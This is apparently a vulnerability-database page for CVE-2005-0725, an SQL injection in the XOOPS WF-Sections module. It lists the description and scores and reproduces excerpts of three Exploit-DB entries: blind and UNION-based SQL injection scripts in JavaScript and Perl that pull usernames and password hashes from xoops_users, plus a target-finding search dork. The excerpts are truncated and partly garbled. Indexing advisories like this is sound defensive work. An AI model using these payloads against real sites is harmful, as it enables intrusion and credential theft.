CVE-2005-0725
published 2005-03-08CVE-2005-0725: SQL injection vulnerability in the getAllbyArticle function in wfsfiles.php for WF-Sections (wfsections) 1.07 allows remote attackers to execute arbitrary SQL…
PriorityP335high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.04%
59.6th percentile
SQL injection vulnerability in the getAllbyArticle function in wfsfiles.php for WF-Sections (wfsections) 1.07 allows remote attackers to execute arbitrary SQL commands via the articleid parameter to article.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| wf-sections | wf-sections | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
XOOPS Module XFsection 1.07 - 'articleId' Blind SQL Injection
exploitdb·2007-04-02
CVE-2007-1974 XOOPS Module XFsection 1.07 - 'articleId' Blind SQL Injection
XOOPS Module XFsection 1.07 - 'articleId' Blind SQL Injection
---
XOOPS Module XFsection
//'===============================================================================================
//'[Script Name: XOOPS Module XFsection ', 0) == -1) {
alert('False');
}
if (document.getElementById('mesaj').value.indexOf('', 0) != -1) {
alert('TRUEEEEEEE');
}
}
function dal() {
if (document.getElementById('buton').value == "Test Character(0)") {
document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=48)/*');
document.getElementById('buton').value = "Test Character(1)"
setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;
}
if (document.getElementById('buton
Exploit-DB
XOOPS Module Zmagazine 1.0 - 'print.php' SQL Injection
exploitdb·2007-04-02
CVE-2007-1974 XOOPS Module Zmagazine 1.0 - 'print.php' SQL Injection
XOOPS Module Zmagazine 1.0 - 'print.php' SQL Injection
---
#!/usr/bin/perl
#[Script Name: XOOPS Module Zmagazine 1.0 (print.php) Remote BLIND SQL Injection Exploit
#[Coded by : ajann
#[Author : ajann
#[Contact : :(
#[Dork : "inurl:/modules/zmagazine/" Result:20.800
#[Example S. : http://www.google.com.tr/search?q=inurl:/modules/zmagazine/&hl=tr&start=0&sa=N
#[S.Page : http://xoops.org/
#[$$ : Free
#[.. : ajann,Turkey
use IO::Socket;
if(@ARGV : ";
$dir = ;
chop ($dir);
if ($dir =~ /exit/){
print "-- Exploit Failed[You Are Exited] \n";
exit();
}
if ($dir =~ /\//){}
else {
print "-- Exploit Failed[No DIR] \n";
exit();
}
print "User ID (uid): ";
$id = ;
chop ($id);
$target = "9999999%20union%20select%201,2,3,concat(char(117,115,101,114,110,97,109,101,58),uname,char(112,97,115,115,119,1
Exploit-DB
XOOPS Module WF-Section 1.01 - 'articleId' SQL Injection
exploitdb·2007-04-02
CVE-2007-1974 XOOPS Module WF-Section 1.01 - 'articleId' SQL Injection
XOOPS Module WF-Section 1.01 - 'articleId' SQL Injection
---
#!/usr/bin/perl
#[Script Name: XOOPS Module WF-Section : ";
$dir = ;
chop ($dir);
if ($dir =~ /exit/){
print "-- Exploit Failed[You Are Exited] \n";
exit();
}
if ($dir =~ /\//){}
else {
print "-- Exploit Failed[No DIR] \n";
exit();
}
print "User ID (uid): ";
$id = ;
chop ($id);
$target = "9999999%20union%20select%201111,2222,3333,4444,concat(char(117,115,101,114,110,97,109,101,58),uname,char(112,97,115,115,119,111,114,100,58),pass),6666,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20xoops_users%20where%20uid%20like%20".$id.$kapan;
$target = $host.$dir.$file.$target;
#Writing data to socket
print "+**********************************************************************+\n";
print "+ Trying to connect: $server\n";
$sock
No writeups or analysis indexed.
2005-03-08
Published